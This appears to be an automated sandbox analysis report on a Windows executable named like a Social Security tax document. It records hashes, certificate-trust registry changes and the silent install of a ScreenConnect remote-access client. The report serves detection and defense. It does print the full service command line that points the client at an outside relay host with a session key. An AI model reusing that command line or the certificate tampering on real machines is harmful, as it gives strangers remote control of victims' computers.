bb7312ad8dba9f8436d783d46df5ce59a0255ecf113d68585c5bebf14671ab86

Resubmissions

27/03/2024, 15:17

240327-sn4edsab21 8

27/03/2024, 15:01

240327-sec6vaef54 8

27/03/2024, 15:00

240327-sdj8rsef32 3

Analysis

max time kernel
1144s
max time network
1193s
platform
windows11-21h2_x64
resource
win11-20240214-en
resource tags

arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
submitted
27/03/2024, 15:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SSA-taxID-351788.exe
Size

84KB
MD5

6fbb5177c1783b1a798b116887307962
SHA1

e77ad960baea0c7c882ba91ddcc5848a479e91c2
SHA256

4443b89e20c8ad7df0158ebeb2bb0266951ea1885aec2a1f8e7011ba275a1682
SHA512

a64684c80c7d9840375f05eb491dacc2685ed02a6612f3f5fc4f3bdaeb6da774da65fb0a550ef2343511bd58e2f0105d468f9454c4fa44512116c34858217a85
SSDEEP

1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xm:yFNpo6rIKlUE8fbkqRfbaQlaYYSm

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Manipulates Digital Signatures 1 TTPs 4 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	SSA-taxID-351788.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	SSA-taxID-351788.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	SSA-taxID-351788.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	SSA-taxID-351788.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (56803b7a-ca34-4801-af8b-8afe3bdff8cd)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\HY3JQD3E.Y6X\\VDHRKP5E.68T\\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-mguhbu-relay.screenconnect.com&p=443&s=56803b7a-ca34-4801-af8b-8afe3bdff8cd&k=BgIAAACkAABSU0ExAAgAAAEAAQDhx8OBj8FY8rB1VrDLChLP1LLvdBBljaauOrbEq6YeMiLKF8LA3tBnj7v%2bjnNSUoOgIYPdPVZVC89yNv4W6OHmtypYW6YajtDJo5zSReYHx%2fMVp1JeQxEyGWGVCcQaECUzy2npekQLBoCxF4skgFnbSweEO0PYHaDJL3LQ916%2fNkbdny3ByOho6jMuGHldl7DFDrdhGxxo91apGBvgTWZjjcLUCmmza2jEJqNDpgolf6%2fw6SGFOWJmoAo%2bHAL2HAr2bIEXc1TO55YYZu04meZuADpu3TP%2bZdwje%2bhzckgeVv7fnDETwzx84R41umbfOLsz1%2fBvfyca4Ps3ogcrRTS9&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAT9x6M2exFE2sV9BmyuZloAAAAAACAAAAAAAQZgAAAAEAACAAAACMd9hrj9RHhf9R4yaDtp0QMEPWhPhLKkNjtik5LXUXWwAAAAAOgAAAAAIAACAAAAAMAhQT7xVqZE4bsEjpKpnKt04k41A1tS8zdHfnTH5Fz6AEAAAvIs%2fM1UbZN8h2Fo%2f6XuWD4nms6vyzSeo1DM0kdmgQ45HOwSt14qE68m7Ua0%2b0XQ9khli6zahiYn%2fxPicjyPKykAP15PZLrYQ5yWmv%2bJ5hqIDaVVTsVtHAaGr%2fYezKHyoZjubkA%2f1EvvvXqfZC7umP9YzPgJhq52AhLAHN4zH4P5Mxh2tbVBrP3YY%2bN%2fXHRrLap%2bxCcaZ65YXJzzPelO9E7UhqWnuJ5aXB10DnX%2bz0tt%2fMdDXodm%2f34t1ac6N%2f53%2b9J4%2bDOAK4UVQQksJ69lSHToVbfOJhFa8MaDpWusETfFqPyVJlx6K6XWDqIOXu9FV42mnoPx6FpFD2%2fClcA2oWUOMUNYzWieK1ROcgHOY7hODNU1yjGFx32%2fd5fOe14EpDFcBPp1c7ZgHTPlt9BlKXtm7OHDRJmpu2G279YwPeppwQS1xYqGVRO4ahtFki94lhX9%2b5kH93rI5ZrmE3Jvf%2fc7Ws0leNiAZKb9cgLhxF%2fcd%2bJai7UyfEoy75u0ITvw0Ks4dAjOyo7J5uFWFL6Vh%2bioF%2f161OIyb%2bMKuDOuTdolEAy6atNxcI7uIOUHm9ATm4XKiX6XUrf5CSN02Qwv2GGhGty1zpthO8texEZquO4ubWvBXrigi77J%2bRAV2%2bzGUbwC1wRXJ9gxaI7EfrIsZnHTaUMrJYw51HTh%2f3FBVMnuMgcQVRscCSVH%2ba4KOrgGMtCdx%2fBcmep7oYWvXHFGo0jccttoAypKQlz3IPXDoF2V8YEopmKIPJFCggb6R%2fz9H0bUaA2byIfaFBt5uiVgCdCz2lnKSlE6r2Ya4EZ7o%2fbrQFIZh4VRG5zixVznlEQISErdo7iQYXmcAZtWDwCBwHaALTzpTawdAMu6%2fLBC0XyNHbe9KiQcCGn79h36%2bfwoIxgBwlKtkzgCiZDX6nWw8TuaUn2ZewIYlXSRlGgSWqn9cuf2RYUpLzA4rmeRAxGem4%2fxaAhRy44wF5lvgfnt5eVEUNwP7qFToJCcefvLdBCw3Fho%2fsmmomUS4ckCdwduekO0uOZYqf4Y%2f3vj8vZbE38CFcOOofLioNlfDYxBbAxBi%2b5aQ6rjIW6c%2b4PkMEG%2bJGSS9HiPrSn1gDhoKm%2b8zYKUHupu7VKtyuDc9Q7JeRDO4pWkR6kp%2ffxY2IRazQ0hlT6iMYeSrAc5HDxcXS%2bXqeFu6RCG%2fZpY4V6ZItcIJJ64uGDjHTnWiDYJoESVcGOrVMtd7IKNQp%2bu9iTSlTSVf1aYaTbgPfQpjq4K3AAmcc3tfqiJy8gB4Ag8%2bpHczB3K%2bGVygQrW0mstq3g%2bxlLJ7TStm%2bwa4z%2bp8Phg%2fV1ivDEE7aSPRXWecHwVf2HRDsbZxFux4TMPPv1uM9yJk14FtkDQHYcItAVUmdOnxdxD%2brcHOSLVDdggXCZdmHVzH5U9kNbnOYKfeNNLebaidIVhtai0Dm6fCLNHSNZ2AZQ9SZ9XffH9cQOHaGnomOb9SsTR5kybrtlgdhkq1mHmTAJiniceGgzAMpTzrEZS3zq02K21kkVIRtG8P%2b6ix%2bakqrPmASroU1BJxKE0gOpQaUZuFhPhRzNLXqfaCCeu%2bRYzejkUAAAABaE2ZzTS490gxtHQk5%2fM0FF3CLcWqzxEnLvIm4jN8VTwtYFfjDiTgvvDj0ehjbCpvmeJuk7AW%2bzQXtfMFv3ilN&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Executes dropped EXE 6 IoCs

pid	Process
3904	ScreenConnect.WindowsClient.exe
3276	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
4052	ScreenConnect.WindowsClient.exe
2296	ScreenConnect.WindowsClient.exe
1860	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
3276	ScreenConnect.ClientService.exe
3276	ScreenConnect.ClientService.exe
3276	ScreenConnect.ClientService.exe
3276	ScreenConnect.ClientService.exe
3276	ScreenConnect.ClientService.exe
3276	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!0100000079b7570e1c120000e4010000000000000000000 = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\lock!1a000000d0b8570e400f00009c060000000000000000000 = 30303030306634302c30316461383035396633663630306566	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_208965e6b5aa6dc2	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files\ScreenConnect.ClientService.dll_e781b1c63 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 0000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\DigestValue = 8807695ee8345e37efec43cbc0874277ed9b0a66	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_b042e0337f243d68	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\SizeOfStronglyNamedComponent = e918090000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\DigestValue = e92a4eaee9d896964de541ce2f01c2404b638258	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\lock!14000000d0b8570e400f00009c060000000000000000000 = 30303030306634302c30316461383035396633663630306566	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files\ScreenConnect.WindowsClient.exe.config_f7 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\lock!10000000d0b8570e400f00009c060000000000000000000 = 30303030306634302c30316461383035396633663630306566	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
